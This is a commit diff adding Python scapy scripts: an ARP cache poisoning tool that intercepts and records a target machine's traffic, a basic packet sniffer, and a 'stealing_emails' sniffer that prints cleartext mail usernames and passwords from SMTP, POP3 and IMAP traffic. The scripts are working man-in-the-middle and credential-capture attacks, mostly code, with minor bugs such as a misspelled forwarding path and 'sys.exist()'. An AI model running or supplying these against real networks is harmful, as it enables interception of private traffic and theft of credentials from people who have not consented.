some scapy scripts

Network_and_802.11/scapy/arp_cache_poisoning.py

@@ -0,0 +1,128 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+'''
+To run you need to tell the local host machine to forward packets along
+both the gateway and the target IP address:
+$ echo 1 /proc/sys/net/ipv4/ip_foward
+'''
+
+from scapy.all import *
+from scapy.error import Scapy_Exception
+import os
+import sys
+import threading
+import signal
+
+# sends out the appropriate ARP packets to the network broadcast address to reset
+# the ARP caches of the gateway and target machines
+def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
+ print '[*] Restoring targets...'
+ send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', \
+ hwsrc=gateway_mac), count=5)
+ send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", \
+ hwsrc=target_mac), count=5)
+
+ # signals the main thread to exit
+ os.kill(os.getpid(), signal.SIGINT)
+
+# use the srp (send and receive packet) function to emit an ARP request to the
+# specified IP address in order to resolve the MAC address
+def get_mac(ip_address):
+ response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address), \
+ timeout=2, retry=10)
+
+ # return the MAC address from a response
+ for s, r in response:
+ return r[Ether].src
+
+ return None
+
+# builds up ARP requests for poisoning both the target IP and the gateway
+# we keep emitting the ARP requests in a loop to make sure that the ARP entries
+# remain poisoned during the attack
+def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
+ poison_target = ARP()
+ poison_target.op = 2
+ poison_target.psrc = gateway_ip
+ poison_target.pdst = target_ip
+ poison_target.hwdst = target_mac
+
+ poison_gateway = ARP()
+ poison_gateway.op = 2
+ poison_gateway.psrc = target_ip
+ poison_gateway.pdst = gateway_ip
+ poison_gateway.hwdst = gateway_mac
+
+ print '[*] Beginning the ARP poison. [CTRL-C to stop]'
+
+ while 1:
+ try:
+ send(poison_target)
+ send(poison_gateway)
+
+ time.sleep(2)
+
+ except KeyboardInterrupt:
+ restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
+
+ print '[*] ARP poison attack finished.'
+ return
+
+INTERFACE = 'wlp1s0'
+TARGET_IP = '192.168.1.107'
+GATEWAY_IP = '192.168.1.1'
+PACKET_COUNT = 1000
+
+# set our interface
+conf.iface = INTERFACE
+
+# turn off output
+conf.verb = 0
+
+print "[*] Setting up %s" % INTERFACE
+
+# resolve the gateway
+GATEWAY_MAC = get_mac(GATEWAY_IP)
+
+if GATEWAY_MAC is None:
+ print "[-] Failed to get gateway MAC. Exiting."
+ sys.exit(0)
+else:
+ print "[*] Gateway %s is at %s" %(GATEWAY_IP, GATEWAY_MAC)
+
+# resolve the target MAC address
+TARGET_MAC = get_mac(TARGET_IP)
+if TARGET_MAC is None:
+ print "[-] Failed to get target MAC. Exiting."
+ sys.exit(0)
+else:
+ print "[*] Target %s is at %s" % (TARGET_IP, TARGET_MAC)
+
+# start poison thread to perform the ARP poisoning attack
+poison_thread = threading.Thread(target = poison_target, args=(GATEWAY_IP, GATEWAY_MAC, \
+ TARGET_IP, TARGET_MAC))
+poison_thread.start()
+
+try:
+ print '[*] Starting sniffer for %d packets' %PACKET_COUNT
+ bpf_filter = 'IP host ' + TARGET_IP
+ # start the sniffer that will capture a preset amount of packets using
+ # a BPF filter to only capture traffic for our target IP ADDRESS
+ packets = sniff(count=PACKET_COUNT, filter=bpf_filter, iface=INTERFACE)
+
+ # write out the captured packets
+ wrpcap('arper.pcap', packets)
+
+ # restore the network
+ restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
+
+except Scapy_Exception as msg:
+ print msg, "Hi there!!"
+
+except KeyboardInterrupt:
+ # restore the network
+ restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
+ sys.exist()
+

Network_and_802.11/scapy/simple_sniffer.py

@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+''' A simple sniffer '''
+
+'''
+DOCUMENTATION:
+# sniffer that dissects and dumps the packets out
+# filter allows to specify a BPF, wireshark style to packets,
+# for example, to sniff all HTTP packets you use a BPF filter of tcp
+# and port 80
+# iface parameter tells the sniffer which network interface to sniff on
+# prn parameter specifies a callback function to every packet that matches the filter
+# and it will receive packet as its single parameter
+# count specifies how many packets you want to sniff (blank: infinite)
+sniff(filter'', iface='any', prn=function, count=N)
+'''
+
+
+from scapy.all import *
+
+# our packet callback
+def packet_callback(packet):
+ print packet.show()
+
+# fire up the sniffer on all interfaces, with no filtering
+sniff(prn=packet_callback, count=1)
+
+

Network_and_802.11/scapy/stealing_emails.py

@@ -5,26 +5,22 @@
 ''' A simple sniffer to capture SMTP, POP3, IMAP credentials'''
 
 
-''''
-DOCUMENTATION:
-# sniffer that dissects and dumps the packets out
-# filter allows to specify a BPF, wireshark style to packets,
-# for example, to sniff all HTTP packets you use a BPF filter of tcp
-# and port 80
-# iface parameter tells the sniffer which network interface to sniff on
-# prn parameter specifies a callback function to every packet that matches the filter
-# and it will receive packet as its single parameter
-# count specifies how many packets you want to sniff (blank: infinite)
-sniff(filter'', iface='any', prn=function, count=N)
-'''
-
-
 from scapy.all import *
 
 # our packet callback
 def packet_callback(packet):
- print packet.show()
+ # check to make sure it has a data payload
+ if packet[TCP].payload:
+ mail_packet = str(packet[TCP].payload)
+ if 'user' in mail_packet.lower() or 'pass' in mail_packet.lower():
+ print '[*] Server: %s' % packet[IP].dst
+ print '[*] %s' %packet[TCP].payload
+
+
 
-# fire up the sniffer
+# fire up the sniffer on all interfaces, with no filtering
+# store 0 ensures that the packets are not kept in memory (good when
+# leaving a long term sniffer running, so wont consume too much ram)
+sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)